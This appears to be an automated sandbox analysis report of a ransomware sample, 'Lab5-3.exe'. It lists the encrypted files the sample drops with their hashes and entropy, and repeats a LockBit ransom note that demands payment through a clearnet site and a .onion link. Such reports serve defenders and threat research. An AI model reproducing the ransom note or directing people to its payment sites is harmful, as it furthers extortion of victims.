                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):28736
                                                                                                          Entropy (8bit):7.994044222034914
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:/sYL8yYIi00F8wLIqbQNeqMU2ZaQxP3+9spZ:/gyY9F8oMYqMXZakP3SspZ
                                                                                                          MD5:ED0C7F1C4DC494577A5C51DD220E4C1F
                                                                                                          SHA1:671F72F71D108ACA78BE9D6F479B0AE6AE4CAE9F
                                                                                                          SHA-256:84CE8B55C852E742A7022AA563BBB8C8DA88B4F802A2874577D3AE42A1AB936F
                                                                                                          SHA-512:DF0D3707728B966D19542FB2965F15D95372079A2662102A2A795225A4D5BC06A60557636C8FFC49D16E373C73D5D29E0E21B00373BFC3C182A37DBFB8D38042
                                                                                                          Malicious:true
                                                                                                          Preview:....KEd.Z.`.....0a.2p?....:.Y.~.Vv.....K....c......i.Yb.HB.R...c[......T...#...5.`.....j.&.R.U.2.........C.Z...{)g.A...b\.M.R?&......+..p....W.ci-.....D..0....f!.'K....H...\.... V....V...+.q.y..v!...}b.....T.u....[Z...G.w......$...O..1...:...%.6...7.......N..1..O`.........!.y.....s4!d.O.=$....@.z%..p....H...qrj-..\.}a.x......*4R..F.....b.OX. E.-.i.<..Kq....Oqw..z......l.J....r..8.eP....]1........N...O..[V.l..........8}....v.t...'LF8.i....]..9.R.]"U27R.......NB...c...\M'kw.......n...c.r....h..4..j..H%SZl..58$.....w.@s..uL.N..\F..s..I....{.k0..)...'...i..8.T\y.....V..T...V..X.C..rImz......s......xqv............w..9y4G.Q.L....,.SK2.N9...H..G.~..8X.C.....-k.a...yy.(.W.......A...$Jm..<}.Aa...2......p.^.........y..S*.;..9n`;.. eK.Z..O&.U@....}:.......u.J0tF.iV......l.a...`.f..R..+c..$.GW..B>...DQ.xK..`H...\...."....h....0....Z...p-^................'r%;.J.J.,...I..\B.5x-....I.f./.?.....lJ../c....R.)3_.\D0E.~..LlcK..I...N..L~....!G.|O..7.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):32192
                                                                                                          Entropy (8bit):7.99527260799976
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:R6JKtM6NHGntWiYusXOv9knYBXsHf/wWakUEquceSZ:QKtMKH6Jvlv9kAXr2UIcDZ
                                                                                                          MD5:9F2DDB7EEE3576BF2D14DC3131D22122
                                                                                                          SHA1:0920C4F5069E5CD09F669FBF3FDB46CA7F69E39F
                                                                                                          SHA-256:654E33C2AB0683536CB919E49464201E95717B763D112CC80BF6FE61B7E05055
                                                                                                          SHA-512:AD5B87A42DA25D0F9FEA79D4E03CECD8402AFF875852594C2550D50B8261591FEBD38B83EA0F0DDAE42D5672C913A8F6A7F8A7CBB4945B660A5FF1328E4A21E6
                                                                                                          Malicious:true
                                                                                                          Preview:.....%.O.R.b.@...'8q..Y...cT..n.%.% ..LH..*..{........J.1..n..V....r.EX.A..c.~..]c.F...B....c.Q....B.Ra...Vz..eP...5S..yr.....<...=Y...:6.5......6.\K.^....-?.*.....j-..U.."..bS..1.V.,..h8,.t.Z7..... a4...xG_.".8X.j!7.}...........8(.f.....p......)..g.+X...f.&\....h.xl...B;\g.a.P....J..[..0.}+..3......Y.....+...K.hI...w........rF;F..A......5.z.;...I..=...xmna"/.;J...M.UX..Q7z....$.{1...fl.N.[..=.DW... R.A.g.v.2n.}*.J... .i..i.j.-..p...fj...>..jZ@..~Y...L-".~.....,AG.m.....NO.h..*)...NlF...().....6'##R..\..W..!.c...GU..z...z....{.}..UPX..y.....$.E$....p..s..I..R...'..E.|v}.J@.E..K.3...#5U...M.V.Ii&.T~...#...b..6{.>.|;........s..x.[n.|.].3kD.I-M.../E.^W......F@.K....vm..`(\..J.l.S.l..)5,...).M .....8....Y*.....&.......}.y0.]JX..-.....f,..J.".:r|......s}...JZS*...[?3..^......<.o.<..4....>o..1..W$..`.;.....N..^.9...d5.a../.......... zm.:...Gi..9Et....J...m......#.M..B.q..f..M WtC..Q..v[&._<.Z..b6....h."..^k,9...'..G}...B.I.Gq..?.=.#M['..,..<....(J ..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):33760
                                                                                                          Entropy (8bit):7.994676296033237
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:4WX8k6B1znWc3cVUZLEAh5CTPu8DsRHvDZQnrW7Z:4WXb6PrciLEAM4RH1Qn67Z
                                                                                                          MD5:F0ED27D0DDD59B59E499577CB9F03D1D
                                                                                                          SHA1:36FD83C2B85EB1C69DCB5A289CED2CB386E0E2CB
                                                                                                          SHA-256:4165E03B5027062969A1D763C0CE3CC3350315FFAFB9F8E43B948ECE13693A77
                                                                                                          SHA-512:06F0633F0FD985014BE1974ADBBEB9C184A3CD2ABE41FA68013D820E04167001266D8E5B20E47D3F13966A28DCBB1B0BDB1F5860D115261875A87F0B5F17F18A
                                                                                                          Malicious:true
                                                                                                          Preview:...G.m..|lG.....Wl.......-y.l.{!8..k/.wTFzH..+....U`..~.,...pf........Y/.....%8..@b|.N... ...W.Uu.9..4r...v&.@j.......m]..X.".N?6...aYw..R.]{.E..2.3p.(p#..:......qE36|..Fz....k?`.16....0.$...9X.....f.A#......0...5'.<...........7. O......a....~.-........}{.....4o.M.wb<|...^z"s.......V..$|..DM...hZ....".P=J. .yl#Y.f...(.\.nq..#T..C....0....MR.+...z{?..3...8...jh9.....l....%.<..G.1|......+f6.!UOGN..*.S.....y..C|..w.F-......D........ew...U..4,..8..r.a...^...7."..?q'=-..$..T..ow....wh.G].1.?9vF@I.}c...'a);....A...lu....2... 1[s]..7...CK...R.F.?......e8kW.@.g.^...zqZ.FSj......Q..'guIN..}[s..N....K...~...k(n.O..x....0.#2.t..........`....L..)?..~.0.Y&...[....$...}...Os...G./c.I.V7...K..u..z..V.....#..m.I.d.......0.O.:+..@F..9..5.Z...u...IG....7.Y.B.....p...$B...,.G...D..U.*.......l>...[Vv.>j........$D...`....BG........QA.3..%...{..6g....2.......:....12.3?..T.c..d..].C\.P......j.....I;.R2.GD.IT.........[*.M;k..^.D.../.Q...K.,+..X.l....U..a..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):34880
                                                                                                          Entropy (8bit):7.995049419619846
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:dcaLSQYvZEsu278DZVQ9NJmJm+xlnu1PUiOJD6paOqBwZ:dcaLSJTu82ZVYNJmJm+xlQMiOx+xtZ
                                                                                                          MD5:E541979D6F23C2AC55ADB417B545AB3A
                                                                                                          SHA1:C3EF561ABAC0DA1D9F602AFF37930ADD61EFFBCC
                                                                                                          SHA-256:2ADD7E2CD2EA963EC8E98F5C064CEE3ADD5B03AB7956DBCAD2D8A72EBF270082
                                                                                                          SHA-512:95565C2F94D55ECAC7D8F03D6B333F7F25DE5221C4675D7715B0855DECAF829FBD8FA0600054E49A08369D831DA25D5E9FDDAF0C050BC01692FF31418E1CF40C
                                                                                                          Malicious:true
                                                                                                          Preview:w'*v.9.~.*.8.CB{.Oh....J^.....m.`.o'P..(.HIVU&.m.L.G.....V..~.....k...x.r....}..K.....{Hp5b+<T.S5_..qjz....13.P.D...r..+...E.2.nHHE..n-....x.+Z.`Z.......}.. .......2p...1..k.E...B....g..4.R.D.p_)V.. ..(.?/..fb.......a.p..Lw...qm.....yC..q..J.7..?...\.v..j$g'.`.....m.\.FH.F.....P..A.@.y..+.%._U...hH..4.......W....J~...h...^.e.J?.....^.....+A....!$.."..!a.MT!.H]<v....1....1...s{.......r.l..z...tW.........Y.9q2..l.....f.... #....|&]&.+......Z+.......8.....L...U.6Os....u.:&...<...d...K...r..ey.%.N.u.>[.H}...O..y....xoI.n.g'd.$..:...r..v.sV....QA.R......H......_i.>..`.|.q.. ...L.}...1.j.....Q8..(..L.../.Au.sxG....7.....Tm.D)=.".......?s..|..".,+.%k4/[R...V...\..q..a.]..........P.pR.Dt...D.4.cG.pM.pS.q.}j#...^%yXm....PKK\3..=.`.".~........D..o..q.....o..0....x.E.......lRV.Xbk..{..]!]y...p...Ot..,..1.L.. &.v.Qq`.0./r.>n.[....W.y..~U...Z_.ft.f.%.w.......B..9=..L.h.5.a...,..u/3.e.G....i.T.@....v..*K.........G.........}.1......c....p.T.DE\.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):34880
                                                                                                          Entropy (8bit):7.995502215377746
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:QNlta/TyA1REqzj2aRgJ80ntOUJ2Uw7a1FU4wiw+bYDriDQHqjz5KuZ:QI/WA1HdQZntOUo7YlwKa2DQ+5KuZ
                                                                                                          MD5:547EDDDF89DE8A62819E8A424FE96AEC
                                                                                                          SHA1:01150BB212330BE708EAC11D966F424FFA1C94FC
                                                                                                          SHA-256:25064A33889E5337EF23CE0AD043BBDB0694CFFA49407EB04CBB9E7BE63A62C2
                                                                                                          SHA-512:C0BA97FE902264EFD386F9ED054F53DBD2C9828B9580F8E368990E03FD5A750D908AD7C077DDB9B2808D27A157049FB55B9D2615289EA5C91138685355198355
                                                                                                          Malicious:true
                                                                                                          Preview:.c.......a...4..).$.Sd.r^........1w.`..s%.#...O.......B0P..3Bqg.."....fF9k*.....@N.rs.!"$..I9.......G0o&~B...-.....*.`...5=.#...z...D.H..u.z!.}...2.4.{.}..)?.....16..........:.2.x..<q.P&.]..R-..i4..6cN.,......4&;=.)]......aY&.w..zq..~zk..<5.X..&qt{S..yc.5...........p..[i.h?....w6.=P..X..ibK..S........y6!....S.#Tq..4...z.]i.gp.....co..........Y..&.Gn.`R..h..\!.@..uy.h.......J..!h....Y0."..g....k.5xQ..1.NH..'+.OV...P.J:PO~._.W.#f...N}p^.u.h.."l.hsf....81.6.K.s.$..]3.)7K.....8s.........}..;.CyzG2.a......Uv....Q........^S......P.......>...l&$.l...z..A..W..s4..e.w2F...;..Q..W.[..x!.c...|h;...-I.0.P...QRcE...[[Z..r.....<@.'.T.c..Vs..u.4rz.k..*.....8^..wg.7....U.=..l..............H..!...#....>.;.AD.........\......E.0......\X.E.i...."...D....}.P.]o.'.w.n......:.'.p.A8Z... .6.(B.Mu8.d.....2...T.7.......!./...\...T.'...!..+.-M.I......H.C....r..}j..&y..&B\...o..T.l%rj......`.#..^o;{gCG...E.....2Y.|J...|...5.._..?b.a>..3$.X..e.&...mP.$]..`T{,
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):37920
                                                                                                          Entropy (8bit):7.995481409249089
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:WZjAyGcTYYPqn7XPbT4cdBKAO3ZhzD38KV5KY2io6pPxctO25ugZ:WFJGhsoTf4cdBKAOppDnRXpi0tgZ
                                                                                                          MD5:F1293E4A54048692F4FD322F4E7523FE
                                                                                                          SHA1:4C90691992D62AEE64A6A18C31318CFEE46A0DFF
                                                                                                          SHA-256:A97A97A22570C92BA3E0AFB4C4316EA0F6A40F491DA14796FE31D2C03A3F5174
                                                                                                          SHA-512:9B93BA0F0E0356B151770AA1B02D02AD1E861F451099C41E1A90C7C0E9DAFA96BB4A17C554F7C30522FF46EDE0E1819DA7B97B88260CAF5B72F369C55C50FEA9
                                                                                                          Malicious:true
                                                                                                          Preview:b.....f..O.K..#,v1'_a.`k.m..Q.z'..xd...,.N..`.Z~J.oS..K..M.k...DQ....k,N.....'x.....RA-..N...v..D.t0...&...N.:.Mr..[.........,q.I..6....HHv.x22}Q@.,X.[Z2,.K^..{.....Y.C[5Z..dwr.^8.,.S. @.H...G.1...o.........*...........l.R.P.VBOb0......<...I.....o.f.C.S].h.B.!#..^...*.g...tj'..2....6..Dx:A,.9.Rt_.w#O........3...{.....k#.O.....:.0..}.U2rc.o_K...sk............~IO.B..zq...~.X] o..2i..[_$....P.....G..3...\6p%.vG......K.d..e.Y"dU..}V..t@..../,.%y{...ZIGF..."..aD..r.......y.og......,6}W9f..}..$..Y[.*$.Z;.F;....fV'`8..t.Q...)..~......!Q......,}...r.,..#.LX.c...o.K..\G..gP......N..s.........]Q..H..9_..gS.......G....]P...e..V."...b3...&..$.-...._.{P..@.......Y_et.\..hDx.3...H .Cqj.........*.z..ZZ...... ...N...)d.....r.....Pl.<.....H..?....B.Z.G.I...[.0...3.......T.l.T!."\.#.$v...&....l.... ......e"...#%|......"$.`\.Xs,..o..C.[.q..%p..O..........p.............w.. ....I...@s0Iw....H's...8.m.!...U|.../.|_...{l....py....q.j.e[]OG...qJdJo.5.N%.....;..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):36624
                                                                                                          Entropy (8bit):7.994945506324703
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:dgxf3bobw0bQ+N4Xw/B5B6qkqqb3lWKSCTDGFfUyR3fs+uJopH5CS65dc0Vjz/Xu:idbokItjRq8KSCHGFfUyVfsdJopH5OdW
                                                                                                          MD5:518E5253D00F257DF896D3C9C3BA067F
                                                                                                          SHA1:612BBC89CC7646AE00A5396DB4ADCC1B32E178BB
                                                                                                          SHA-256:A3F0A69325447FD0B4A43172A20487C6719A35FC9B762DCB7698D6DD358B4835
                                                                                                          SHA-512:18347859C70280C33CD556F2A6C034A2002CEBBAA5A8C1A3080E240EDBA0198504D17019B1C9D3E661CD6FCA7720103886A9684AFC0174E0538DEE61A3DDED00
                                                                                                          Malicious:true
                                                                                                          Preview:..h.9U..].74.7.1V.?.. .r,...(.>...|%..[.....s..%..n..0,"..`j.g.B=.8..UW...1$#..n.j.....a.Hp.{.U-a.C...-...T..]..T.8....7SU8.x.C..g...M..x....M....U...V.V...5....r4"#........j..6.=\/.hS..}.l...1.n..Le....=......%.-..)3..Tn..u..K.L....D..."..d.|........."W1L.....R......2.MU.#.V.O....L.Jro.... J.P...$'NQ.I.p5.ED.7D,='oK7A.H....s....:...6...EADO.q..{+(....<\'..$.....%6.X..o......B2.P#'.rZ.!=.AU...o..6<l..p..G....J..'l.!.D9&.v..op&.../xb.!M.sV`..{...z.ekM.....1w..p|....qH.f.... .6&*.5..E.4..:.&#.Q(%..-..91P..C...<........b....jw.Qy@...h...fS......t.I...C.G$..sc..j6..._.,\q......^..k..............=Es.K+..Qc.-..g.{+_*zL.._8u..U..=Do~9..E......'.dOH.-3.a;.<GH..K...ii/p...T.&.?.o...L2.V=..m..tJs..^..........~.....s..&.m6&L29uE.LgP....O......._OM..."c...p...^...#.2\...<.a..0..#...+....&~.O.Q"K....R*..bO......... .....i%./...)N_eha.:...E.....}." 4...U...7).<V.sv.....5..(..P....Y.J....gLm..*8qz..d..Z.....n....s.Y.u...O.+.BO...?H..u......t.#....\...@.[
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):32912
                                                                                                          Entropy (8bit):7.992860400333489
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:2/IdJlFL91BEOe+slMv0JYv5CMuCHlhrv8hGMZ2I741X5OgvWbZ:2/wXN91SX+gMMYzFhCGMII01XqbZ
                                                                                                          MD5:E20CEE05239AAA67655D31E98114F20E
                                                                                                          SHA1:DBA8846A3E7B1F4F7BB85753C7295EB31B664495
                                                                                                          SHA-256:2D5737F3F929BAF1365E93EEDF7FE500AF3DDD7A12690FC8E906DF36E420802F
                                                                                                          SHA-512:564FD50F747A759282579A61C5F88B4B903CD07917C7D90F279C36BEDDF0DAD8072C07D165D846D82AA4B6119933F24035A4BC5ABB6F3525651B1A3EC30A1816
                                                                                                          Malicious:true
